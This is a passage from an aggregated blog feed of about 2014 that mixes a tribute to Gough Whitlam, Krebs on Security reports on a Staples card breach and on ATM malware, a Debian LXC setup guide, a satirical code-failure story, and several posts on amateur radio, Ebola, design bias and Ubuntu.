I had a number of conversations with him, and there are two that stick in my mind. The first is when I rang him as a young Member of Parliament with an interest in fixed-term Parliaments and knowledge that Gough had championed this cause, including a proposal for simultaneous Federal and State elections. I was pleased that my call was put through, and astonished that Gough was able to rattle off, without any forewarning of my call and in the days before the Internet and Google, the electoral arrangements for many of the states of the USA.<o:p></o:p>

Later on I won an afternoon tea with Gough in a Labor Party raffle. This time he did know I was coming, but it was 2002 and he was by then 86. I was again astonished to see that at the ripe old age of 86 he had gone to the trouble of looking me up on the Internet and coming to the afternoon tea extremely well informed about my background and interests.<o:p></o:p>

No doubt Gough made mistakes. But the fact is that anyone in public life makes decisions every day, and it is unreasonable to expect every one of those decisions to be correct. And a Prime Minister makes hundreds, even thousands of decisions. Yes he was defeated decisively after three years, but that should be understood in the context of coming to power after a 23 year absence for Labor, and bumping into a world which had been shaped by and was dominated by his political opponents. After the change of government Malcolm Fraser acknowledged the need to make the Senate more representative and sponsored a referendum to require State Parliaments to fill Senate casual vacancies with the nominee of the Party the Senator had belonged to. And it should also be understood that Gough was newly in power when the OPEC oil shock of 1974 hit - this generated inflation and unemployment, and most Western governments unfortunate enough to be in power at the time did not last for long.<o:p></o:p>

Gough's struggle with Malcolm Fraser was titanic. I remember United States commentators at the time remarking on the ability of the two men, and wondering why American politics was not throwing up leaders of comparable calibre.<o:p></o:p>

The best thing we can do to honour Gough's monumental legacy is to protect it. Whether it is tertiary education, or health, or environment protection, or indigenous affairs, we should honour and protect his legacy. Most of all I hope we remember his commitment to politics as an honourable profession. It is unthinkable to imagine Gough taking on a job as a corporate lobbyist or company director in a post political career. The idea of using a parliamentary career as a stepping stone to a cushy corporate job would have been anathema to him. <o:p></o:p>

I hope his life and example continues to inspire Australians to undertake public service, and to believe in the capacity of the political process to produce good outcomes, to make people’s lives better, for many years to come.<o:p></o:p>

,

Krebs on SecurityBanks: Credit Card Breach at Staples Stores

Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

staplesAccording to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  

Planet Linux AustraliaDavid Rowe: SM1000 Part 7 – Over the air in Germany

Michael Wild DL2F2 in Germany recently attended a Hamfest where he demonstrated his SM1000. Michael sent me the following email (hint: I used Google translate on the web sites):

Here is the link to the review of our local hamfest.

At the bottom is a video of a short QSO on 40m using the SM-1000 over about 400km. The other station was Hermann (DF2DR). Hermann documented this QSO very well on his homepage also showing a snapshot of the waterfall during this QSO. Big selective fading as you can see, but we were doing well!

He also explains that, when switching to SSB at the same average power level, the voice was almost not understandable!

SM1000 Beta and FreeDV Update

Rick KA8BMA has been working hard on the Beta CAD work, and fighting a few Eagle DRC battles. Thanks to all his hard work we now have an up to date schematic and BOM for the Betas. He is now working on the Beta PCB layout, and we are refining the BOM with Edwin from Dragino in China. Ike, W3IKIE, has kindly been working with Rick to come up with a suitable enclosure. Thanks guys!

My current estimate is that the Beta SM1000s will be assembled in November. Once I’ve tested a few I’ll put them up on my store and start taking orders.

In the mean time I’ve thrown myself into modem simulations – playing with a 450 bit/s version of Codec 2, LPDC FEC codes, diversity schemes and coherent QPSK demodulation. I’m pushing towards a new FreeDV mode that works on fading channels at negative SNRs. More on that in later posts. The SM1000 and a new FreeDV mode are part of my goals for 2014. The SM1000 will make FreeDV easy to use, the new mode(s) will make it competitive with SSB on HF radio.

Everything is open source, both hardware and software. No vendor lock in, no software licenses and you are free to experiment and innovate.

Planet Linux AustraliaChris Samuel: IBM Pays GlobalFoundries to take Microprocessor Business

Interesting times for IBM, having already divested themselves of the x86 business by selling it on to Lenovo they’ve now announced that they’re paying GlobalFoundries $1.5bn to take pretty much that entire side of the business!

IBM (NYSE: IBM) and GLOBALFOUNDRIES today announced that they have signed a Definitive Agreement under which GLOBALFOUNDRIES plans to acquire IBM’s global commercial semiconductor technology business, including intellectual property, world-class technologists and technologies related to IBM Microelectronics, subject to completion of applicable regulatory reviews. GLOBALFOUNDRIES will also become IBM’s exclusive server processor semiconductor technology provider for 22 nanometer (nm), 14nm and 10nm semiconductors for the next 10 years.

It includes IBM’s IP and patents, though IBM will continue to do research for 5 years and GlobalFoundries will get access to that. Now what happens to those researchers (one of whom happens to be a friend of mine) after that isn’t clear.

When I heard the rumours yesterday I was wondering if IBM was aiming to do an ARM and become a fab-less CPU designer but this is much more like exiting the whole processor business altogether. The fact that they seem to be paying Global Foundries to take this off their hands also makes it sound pretty bad.

What this all means for their Power CPU is uncertain, and if I was nVidia and Mellanox in the OpenPOWER alliance I would be hoping I’d know about this before joining up!

This item originally posted here:

IBM Pays GlobalFoundries to take Microprocessor Business

TEDHow do we stop the spread of Ebola? A Q&A at TEDGlobal 2014

Chikwe Ihekweazu speaks at TEDGlobal 2014. Photo: Ryan Lash/Ryan

Chikwe Ihekweazu speaks at TEDGlobal 2014. Photo: Ryan Lash/TED

Ten years ago, epidemiologist Chikwe Ihekweazu helped fight an outbreak in South Sudan. This TED Fellow now runs the health consultancy EpiAFRIC, writes about public health issues in his native Nigeria, and is soon to start a four-week rotation on the ground fighting the Ebola epidemic. So as the outbreak continues, he sat down for a Q&A with Chris Anderson in Session 11 to give insights into what is happening and how concerned we all should be.

The first question: Can we get the scientific overview of what Ebola is and how it makes people sick?

Ihekweazu gives the disconcerting answer that, unlike some other viruses, we don’t know what the natural host is for Ebola. We do, however, know that in humans it is passed through contact with bodily fluids. We know that the disease has an incubation period of 2 to 21 days and that, unlike many other viruses, you can’t actually transmit the virus unless you are ill. “Most outbreaks are relatively small,” says Ihekweazu. In the South Sudan outbreak he helped fight a decade ago, there were less than 30 cases.

This time around, things are much worse. As of this moment, there have been close to 8,000 cases and 4,000 deaths. “This is really the worst outbreak we’ve ever dealt with — there’s really been nothing close,” says Ihekweazu. Public health advocates have one main tactic from here: to stop the chain of transmission from one sick person to another. Those most at risk for infection are family members of those already infected, health care workers and people involved in funeral rites.

The difficulty of fighting the Ebola epidemic in Africa connects to larger currents on the global stage. To illustrate this, Ihekweazu shows us two highly distorted maps of the world. The first illustrates the global deaths from infectious diseases— in this map, Africa and India are severely bloated, while the Americas appear as just a sliver. The next map shows public health spending in the world—here, the United States and Europe appear gigantic, while Africa becomes a thin line. Ihekweazu drops the shocking fact that there is one doctor to every 100,000 people in Liberia. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he says.

Ihekweazu says that he learned some important lessons in South Sudan that will be helpful this time around. For example, that the stark remoteness of isolation wards is a problem. “If you come to a place like this, it’s likely that you’re going to die there,” says Ihekweazu. “The cycle of anxiety keeps people away and keeps the outbreak spreading, because people stay home and infect their loved ones.” A big challenge now is convincing people to trust local hospitals in which they have “little confidence.”

But there is a success story: the containment of Ebola in Lagos, Nigeria. When the first case of Ebola cropped up there, it spread to 13 people quickly. But then the spread stopped. An Ebola response center was quickly spun up.

Thousand of people who’d had contact with patients were contacted and monitored carefully. It worked — there have only been 8 cases since.

Anderson’s next question for Ihekweazu: At this late stage, can the world get this under control?

“It can go either way. We could see a plateau in the next few months — which we hope for — or we could see a radical escalation,” says Ihekweazu. “It really depends on what we do in the next few weeks.”

He feels encouraged as he sees the international community rallying to support the countries most affected by Ebola. “This is a challenge for our common global community — not just a problem for Liberia and Sierra Leone,” he says. “Whether it’s influenza in Mexico, or SARS in Hong Kong, or Ebola in Liberia, the boundaries we hold so dear are not respected by infectious diseases.”

In Africa especially, governments need to step up. Ihekweazu points out that many hospitals and schools operate without running water, something he says is unacceptable. “How do we mobilize resources to deal with health, education, justice systems, to keep pace with development we’re seeing driven by the private sector across Africa?” he says. “We have a large economy, but it’s all private sector. Our public sector needs to step up.”

The final question: What can people do to help?

Ihekweazu stresses two things. First, that people support governments that are giving resources to fight this epidemic. And second, that they give money directly to Médecins Sans Frontières, or Doctors without Borders. “They know what to do — they’ve done it for years,” he says.


Racialicious#GIA14: Racial Conversation as Performance Art

Originally published at Grantmakers in the Arts

The rules of the Long Table.

The rules of the Long Table.

Can a conversation about race be a performance? What does that simple framework shift do to the conversation? The answer: everything.

The long table conversation is a fascinating thing to watch unfold. Participants come in and out as they please. There is snacking and scribbling, mostly on topic. Some people were determined watchers, setting up camp on the chairs on the far edge of the perimeter. And others eagerly queued up in the seats closest to the table, waiting for the moment they could tap someone on the shoulder, sending that performer out and putting themselves into the conversation.

The Long Table - The Beginning

The Long Table – The Beginning

The conversation starts off immediately. There aren’t really any awkward pauses. The presence of the table as a speaking space created a flow that participants respected. I wondered if an art project gave people license to break the rules and conventions of conversation. I felt inspired to draw a circle around an errant blueberry on the table. And at times, I felt the urge to run around, to lean over someone and circle their scribble, to interact out of order and out of place. After all, isn’t that art? Responding to stimuli?

But that will have to wait for another long table. People needed this space – stories flowed alongside tears and while this may have been intended as an art project the space morphed to accommodate mass catharsis.

Defining racial equity.

Defining racial equity.

Race Scrawl.

Race Scrawl.

Screen Shot 2014-10-15 at 11.01.58 AM

(TRA is an abbreviation for transracial adoptee.)

Racial Scrawl 2

Racial Scrawl 2

The session draws to a close. Many are in tears. Some feel a profound shift. Others looked at the way inequality replicated itself at the table. There is no solution. But in art, does there need to be a neat resolution?

The post #GIA14: Racial Conversation as Performance Art appeared first on Racialicious - the intersection of race and pop culture.

Geek FeminismQuick hit: Simply Secure, a new nonprofit promoting usable security, is hiring a research director and an operations manager

Simply Secure is a new non-profit that focuses on helping the open source community do a better job at security. Their focus is on adding usable security technology on top of existing, already-widely-adopted platforms and services, and their advisory board includes Wendy Seltzer, Cory Doctorow, and Angela Sasse, among others. (Full disclosure: I went to college with the executive director and founder, Sara “Scout” Sinclair Brody.)

They are hiring for two full-time positions right now: a research director/associate director with some mix of practical experience and formal education in security and UX design (sufficient experience compensates for a lesser degree of formal education), and an operations manager who will write grants and manage finances. Simply Secure strongly encourages applications from populations under-represented in the technology industry. For both positions, experience with and/or enthusiasm for open source is desirable but not required. Simply Secure is located in the US in Philadelphia and is actively recruiting candidates who work remotely.

To apply, visit their jobs page!

Sociological ImagesApple’s Health App: Where’s the Power?

In truth, I didn’t pay a tremendous amount of attention to iOS8 until a post scrolled by on my Tumblr feed, which disturbed me a good deal: The new iteration of Apple’s OS included “Health”, an app that – among many other things – contains a weight tracker and a calorie counter.

And can’t be deleted.

1 (3) - Copy

Okay, so why is this a big deal? Pretty much all “health” apps include those features. I have one (third-party). A lot of people have one. They can be very useful. Apple sticking non-removable apps into its OS is annoying, but why would it be something worth getting up in arms over? This is where it becomes a bit difficult to explain, and where you’re likely to encounter two kinds of people (somewhat oversimplified, but go with me here). One group will react with mild bafflement. The other will immediately understand what’s at stake.

The Health app is literally dangerous, specifically to people dealing with/in recovery from eating disorders and related obsessive-compulsive behaviors. Obsessive weight tracking and calorie counting are classic symptoms. These disorders literally kill people. A lot of people. Apple’s Health app is an enabler of this behavior, a temptation to fall back into self-destructive habits. The fact that it can’t be deleted makes it worse by orders of magnitude.

So why can’t people just not use it? Why not just hide it? That’s not how obsessive-compulsive behavior works. One of the nastiest things about OCD symptoms – and one of the most difficult to understand for people who haven’t experienced them – is the fact that a brain with this kind of chemical imbalance can and will make you do things you don’t want to do. That’s what “compulsive” means. Things you know you shouldn’t do, that will hurt you. When it’s at its worst it’s almost impossible to fight, and it’s painful and frightening. I don’t deal with disordered eating, but my messed-up neurochemistry has forced me to do things I desperately didn’t want to do, things that damaged me. The very presence of this app on a device is a very real threat (from post linked above):

Whilst of course the app cannot force you to use it, it cannot be deleted, so will be present within your apps and can be a source of feelings of temptation to record numbers and of guilt and judgement for not using the app.

Apple doesn’t hate people with eating disorders. They probably weren’t thinking about people with eating disorders at all. That’s the problem.

Then this weekend another post caught my attention: The Health app doesn’t include the ability to track menstrual cycles, something that’s actually kind of important for the health of people who menstruate. Again: so? Apple thinks a number of other forms of incredibly specific tracking were important enough to include:

In case you’re wondering whether Health is only concerned with a few basics: Apple has predicted the need to input data about blood oxygen saturation, your daily molybdenum or pathogenic acid intake, cycling distance, number of times fallen and your electrodermal activity, but nothing to do with recording information about your menstrual cycle.

Again: Apple almost certainly doesn’t actively hate cisgender women, or anyone else who menstruates. They didn’t consider including a cycle tracker and then went “PFFT SCREW WOMEN.” They probably weren’t thinking about women at all.

During the design phase of this OS, half the world’s population was probably invisible. The specific needs of this half of the population were folded into an unspecified default. Which doesn’t – generally – menstruate.

I should note that – of course – third-party menstrual cycle tracking apps exist. But people have problems with these (problems I share), and it would have been nice if Apple had provided an escape from them:

There are already many apps designed for tracking periods, although many of my survey respondents mentioned that they’re too gendered (there were many complaints about colour schemes, needless ornamentation and twee language), difficult to use, too focused on conceiving, or not taking into account things that the respondents wanted to track.

Both of these problems are part of a larger design issue, and it’s one we’ve talked about before, more than once. The design of things – pretty much all things – reflects assumptions about what kind of people are going to be using the things, and how those people are going to use them. That means that design isn’t neutral. Design is a picture of inequality, of systems of power and domination both subtle and not. Apple didn’t consider what people with eating disorders might be dealing with; that’s ableism. Apple didn’t consider what menstruating women might need to do with a health app; that’s sexism.

The fact that the app cannot be removed is a further problem. For all intents and purposes, updating to a new OS is almost mandatory for users of Apple devices, at least eventually. Apple already has a kind of control over a device that’s a bit worrying, blurring the line between owner and user and threatening to replace one with the other. The Health app is a glimpse of a kind of well-meaning but ultimately harmful paternalist approach to design: We know what you need, what you want; we know what’s best. We don’t need to give you control over this. We know what we’re doing.

This isn’t just about failure of the imagination. This is about social power. And it’s troubling.

Sarah Wanenchak is a PhD student at the University of Maryland, College Park. Her current research focuses on contentious politics and communications technology in a global context, particularly the role of emotion mediated by technology as a mobilizing force. She blogs at Cyborgology, where this post originally appearedand you can follow her at @dynamicsymmetry.

(View original at http://thesocietypages.org/socimages)

Mark ShuttleworthV is for Vivid

Release week! Already! I wouldn’t call Trusty ‘vintage’ just yet, but Utopic is poised to leap into the torrent stream. We’ve all managed to land our final touches to *buntu and are excited to bring the next wave of newness to users around the world. Glad to see the unicorn theme went down well, judging from the various desktops I see on G+.

And so it’s time to open the vatic floodgates and invite your thoughts and contributions to our soon-to-be-opened iteration next. Our ventrous quest to put GNU as you love it on phones is bearing fruit, with final touches to the first image in a new era of convergence in computing. From tiny devices to personal computers of all shapes and sizes to the ventose vistas of cloud computing, our goal is to make a platform that is useful, versal and widely used.

Who would have thought – a phone! Each year in Ubuntu brings something new. It is a privilege to celebrate our tenth anniversary milestone with such vernal efforts. New ecosystems are born all the time, and it’s vital that we refresh and renew our thinking and our product in vibrant ways. That we have the chance to do so is testament to the role Linux at large is playing in modern computing, and the breadth of vision in our virtual team.

To our fledgling phone developer community, for all your votive contributions and vocal participation, thank you! Let’s not be vaunty: we have a lot to do yet, but my oh my what we’ve made together feels fantastic. You are the vigorous vanguard, the verecund visionaries and our venerable mates in this adventure. Thank you again.

This verbose tract is a venial vanity, a chance to vector verbal vibes, a map of verdant hills to be climbed in months ahead. Amongst those peaks I expect we’ll find new ways to bring secure, free and fabulous opportunities for both developers and users. This is a time when every electronic thing can be an Internet thing, and that’s a chance for us to bring our platform, with its security and its long term support, to a vast and important field. In a world where almost any device can be smart, and also subverted, our shared efforts to make trusted and trustworthy systems might find fertile ground. So our goal this next cycle is to show the way past a simple Internet of things, to a world of Internet things-you-can-trust.

In my favourite places, the smartest thing around is a particular kind of monkey. Vexatious at times, volant and vogie at others, a vervet gets in anywhere and delights in teasing cats and dogs alike. As the upstart monkey in this business I can think of no better mascot. And so let’s launch our vicenary cycle, our verist varlet, the Vivid Vervet!

RacialiciousLive From San Diego Comic Fest: The Afrofuturism Panel

By Arturo R. García

The final day of the Comic Fest opened with one of the most far-ranging topics in speculative fiction in Afrofuturism. And true to form, the speakers reached into the past and toward the future in discussing not only their interpretation of the concept, but how it has influenced their fandom and their work.

<iframe allowtransparency="true" frameborder="no" height="750" src="http://storify.com/aboynamedart/live-from-san-diego-comics-fest-afrofuturism/embed?border=false" width="100%"></iframe><script src="http://storify.com/aboynamedart/live-from-san-diego-comics-fest-afrofuturism.js?border=false"></script>
<noscript>[View the story "San Diego Comic Fest: Afrofuturism" on Storify]</noscript>

Top image: A still from the trailer for “The Crypto-Historians,” which can be seen below.

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/NTmoPJDi10s" width="560"></iframe>

The post Live From San Diego Comic Fest: The Afrofuturism Panel appeared first on Racialicious - the intersection of race and pop culture.

Planet DebianMichal Čihař: Hosted Weblate has new UI

The biggest part of this HackWeek will be spent on Weblate. The major task is to complete new UI for it. There have been already some blog posts about that here, so regular readers of my blog already know it is using Twitter Bootstrap.

Today it has reached point where I think it's good enough for wider testing and I've deployed it at Hosted Weblate (see Weblate website for conditions for getting hosting there).

I expect there will be some rough edges, so don't hesitate to report any issues, so that I can quickly fix them.

Filed under: English phpMyAdmin SUSE Weblate | 0 comments | Flattr this!

RacialiciousLive From San Diego Comic Fest: Latino Comics

By Arturo R. García

Over the weekend I went to the third annual San Diego Comic Fest, which has pointedly positioned itself as the anti-Comic Con.

Specifically, the size of the event is kept manageable for vendors, presenters and attendees alike; no conference room holds more than 40 or 50 people at one time, allowing for a more relaxed atmosphere and easier conversations between panelists and their audiences.

One end result is, panels focusing on diversity don’t feel as lost in the shuffle. And the Latino Comics panel covered not only industry trends within Latin America, but the rapidly-evolving effects of Latinidad on the U.S.’ identity.

<iframe allowtransparency="true" frameborder="no" height="750" src="http://storify.com/aboynamedart/live-from-san-diego-comics-fest-latino-comics/embed?border=false" width="100%"></iframe><script src="http://storify.com/aboynamedart/live-from-san-diego-comics-fest-latino-comics.js?border=false"></script>
<noscript>[View the story "San Diego Comic Fest: Latino Comics" on Storify]</noscript>

[Top image via "The Condor and The Eagle: A Pilgrimage to Machu Picchu" official Facebook page]

The post Live From San Diego Comic Fest: Latino Comics appeared first on Racialicious - the intersection of race and pop culture.

Planet Linux AustraliaAndrew Pollock: [life] Day 264: Pupil Free Day means lots of park play

Today was a Kindergarten (and it seemed most of the schools in Brisbane) Pupil Free Day.

Grace, the head honcho of Thermomix in Australia, was supposed to be in town for a meet and greet, and a picnic in New Farm Park had been organised, but at the last minute she wasn't able to make it due to needing to be in Perth for a meeting. The plan changed and we had a Branch-level picnic meeting at the Colmslie Beach Reserve.

So after Sarah dropped Zoe off, I whipped up some red velvet cheesecake brownie, which seems to be my go to baked good when required to bring a plate (it's certainly popular) and I had some leftover sundried tomatoes, so I whipped up some sundried tomato dip as well.

The meet up in the park was great. My group leader's daughters were there, as were plenty of other consultant's kids due to the Pupile Free Day, and Zoe was happy to hang out and have a play. There was lots of yummy food, and we were able to graze and socialise a bit. We called it lunch.

After we got home, we had a bit of a clean up of the balcony, which had quite a lot of detritus from various play dates and craft activities. Once that was done, we had some nice down time in the hammock.

We then biked over to a park to catch up with Zoe's friend Mackensie for a play date. The girls had a really nice time, and I discovered that the missing link in the riverside bike path has been completed, which is rather nice for both cycling and running. (It goes to show how long it's been since I've gone for a run, I really need to fix that).

After that, we biked home, and I made dinner. We got through dinner pretty quickly, and so Zoe and I made a batch of ginger beer after dinner, since there was a Thermomix recipe for it. It was cloudy though, and Zoe was more used to the Bunderberg ginger beer, which is probably a bit better filtered, so she wasn't so keen on it.

All in all, it was a really lovely way to spend a Pupil Free Day.

Worse Than FailureCodeSOD: Parallel SQL Queries

Daniele worked at a pharmaceutical firm that had an old web application that allowed commercial customers to look up information. Since the data was quite complicated, there were numerous fields that needed to be queried in order to populate the form.

Unfortunately, as the amount of data in the system grew, the time to load the form grew as well. And grew. And grew.

Fortunately, the DBA in charge of setting up the underlying tables was actually quite capable at setting up tables with the proper relationships. For example, an address consists of street, city, zip, province and country. A country can contain multiple provinces which can contain multiple cities which can contain multiple zip codes, and so forth. As it was well organized, the database was not the problem; the source of the slowness was likely in the code.

And what code it was. The programmer that engineered this had to have revered this piece of brillance as well. They decided that they would support substantial data growth by querying the data in parallel. Yes, there would be a separate query for each field - run in a separate thread - in parallel. In other words, all of the queries had essentially the same where-clause (except for the joins); only the fields that were selected were different. For cases where one field depended upon another, the dependency was handled like this in the corresponding query classes, which all followed the same pattern:

   class StreetQuery implements Thread {
      // Street names can be duplicated. We need to know in which 
      // city this street resides in order to query for it.
      private CityQuery city;
	  
      private boolean finished = false;
	  
      public StreetQuery(CityQuery city) {
        this.city = city;
      }
	  
      public boolean isRunning() {
        return !finished;
      }
	  
      public void run() {
        // Wait until query on which we depend finishes
        while (city.isRunning());
		
        // do query here, using any results from dependent queries as needed
        finished = true;
      }
    }

Daniele replaced all of that with a single stored procedure and the delays were gone.

One can't help but wonder if the author of the original code might have been helping themselves to a few too many sample products...

Planet DebianMichal Čihař: Enca 1.16

As a first tiny project in this HackWeek, Enca 1.16 has been just released. It mostly brings small code cleanups and missing aliases for languages, but fixes also some minor bugs found by Coverity Scan.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs.

Full list of changes for 1.16 release:

  • Fixed typo in Belarusian language name
  • Added aliases for Chinese and Yugoslavian languages

Still enca is in maintenance mode only and I have no intentions to write new features. However there is no limitation to other contributors :-).

You can download from http://cihar.com/software/enca/.

Filed under: Enca English SUSE | 0 comments | Flattr this!

Krebs on SecuritySpike in Malware Attacks on Aging ATMs

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.

ncrmalware

BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.

According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="415" src="http://www.youtube.com/embed/QZvdPM_h2o8" width="580"></iframe>

Planet DebianFrancois Marier: LXC setup on Debian jessie

Here's how to setup LXC-based "chroots" on Debian jessie. While this is documented on the Debian wiki, I had to tweak a few things to get the networking to work on my machine.

Start by installing (as root) the necessary packages:

apt-get install lxc libvirt-bin debootstrap

Network setup

I decided to use the default /etc/lxc/default.conf configuration (no change needed here):

lxc.network.type = veth
lxc.network.flags = up
lxc.network.link = virbr0
lxc.network.hwaddr = 00:FF:AA:xx:xx:xx
lxc.network.ipv4 = 0.0.0.0/24

but I had to make sure that the "guests" could connect to the outside world through the "host":

  1. Enable IPv4 forwarding by putting this in /etc/sysctl.conf:

    net.ipv4.ip_forward=1
    
  2. and then applying it using:

    sysctl -p
    
  3. Ensure that the network bridge is automatically started on boot:

    virsh -c lxc:/// net-start default
    virsh -c lxc:/// net-autostart default
    
  4. and that it's not blocked by the host firewall, by putting this in /etc/network/iptables.up.rules:

    -A INPUT -d 224.0.0.251 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.255 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.1 -s 192.168.122.0/24 -j ACCEPT
    
  5. and applying the rules using:

    iptables-apply
    

Creating a container

Creating a new container (in /var/lib/lxc/) is simple:

sudo MIRROR=http://http.debian.net/debian lxc-create -n sid64 -t debian -- -r sid -a amd64

You can start or stop it like this:

sudo lxc-start -n sid64 -d
sudo lxc-stop -n sid64

Connecting to a guest using ssh

The ssh server is configured to require pubkey-based authentication for root logins, so you'll need to log into the console:

sudo lxc-stop -n sid64
sudo lxc-start -n sid64

then install a text editor inside the container because the root image doesn't have one by default:

apt-get install vim

then paste your public key in /root/.ssh/authorized_keys.

Then you can exit the console (using Ctrl+a q) and ssh into the container. You can find out what IP address the container received from DHCP by typing this command:

sudo lxc-ls --fancy

Fixing Perl locale errors

If you see a bunch of errors like these when you start your container:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "fr_CA.utf8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

then log into the container as root and use:

dpkg-reconfigure locales

to enable the same locales as the ones you have configured in the host.

,

Planet DebianNeil Williams: OpenTAC – an automation lab in a box

I’ve previously covered running LAVA on ARM devices, now that the packages are in Debian. I’ve also covered setting up the home lab, including the difficulty in obtaining the PDU and relying on another machine to provide USB serial converters with inherent problems of needing power to keep the same devices assigned to the same ser2net ports.

